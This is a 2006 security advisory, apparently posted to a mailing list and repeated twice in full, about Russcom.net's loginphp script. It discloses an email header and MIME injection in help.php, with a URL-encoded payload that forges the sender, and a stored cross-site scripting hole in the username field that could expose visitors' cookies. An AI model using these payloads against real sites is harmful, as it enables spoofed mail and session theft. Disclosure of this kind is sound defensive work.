zerogue@gmail.com
02/05/06, 20:40
Russcom.net Loginphp multiple vulnerabilties
Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)
Russcom.net's loginphp script is a small usermanagement script:
Users can sign up for a username which they can use to login to the password protected main page.
The administrator can delete users. He can also edit the main page.
This script includes the members and help pages.
It is possible to send spoofed mails in MIME-format trough help.php due to improper filtering:
The php mail function is used like:
mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]);
By following the rules provided in RFC 822 we can inject a message in MIME-format like this:
haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0A
My%20Message.%0A--frog--
to get this message:
To: recip@ient.xxx
Subject: Visit www.website.xxx !
From: haxor@attack.xxx
Content-Type:multipart/mixed; boundary=frog;
--frog
Content-Type:text/html
My Message.
--frog--
Hello,
A friend thought you might want to see this page : www.website.xxx.
Bye Bye
for more information: http://www.securephpwiki.com/index.php/Email_Injection
In the register function you can subscribe with the following username (for example):
<script>alert('xss')</script> the input isn't sanitized so you can insert any XSS (30 char max) and anyone who will visit the page displaying
all users will get XSS'd (potentially cookies stolen).
Nomenumbra/[0x4F4C]
Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)
Russcom.net's loginphp script is a small usermanagement script:
Users can sign up for a username which they can use to login to the password protected main page.
The administrator can delete users. He can also edit the main page.
This script includes the members and help pages.
It is possible to send spoofed mails in MIME-format trough help.php due to improper filtering:
The php mail function is used like:
mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]);
By following the rules provided in RFC 822 we can inject a message in MIME-format like this:
haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0A
My%20Message.%0A--frog--
to get this message:
To: recip@ient.xxx
Subject: Visit www.website.xxx !
From: haxor@attack.xxx
Content-Type:multipart/mixed; boundary=frog;
--frog
Content-Type:text/html
My Message.
--frog--
Hello,
A friend thought you might want to see this page : www.website.xxx.
Bye Bye
for more information: http://www.securephpwiki.com/index.php/Email_Injection
In the register function you can subscribe with the following username (for example):
<script>alert('xss')</script> the input isn't sanitized so you can insert any XSS (30 char max) and anyone who will visit the page displaying
all users will get XSS'd (potentially cookies stolen).
Nomenumbra/[0x4F4C]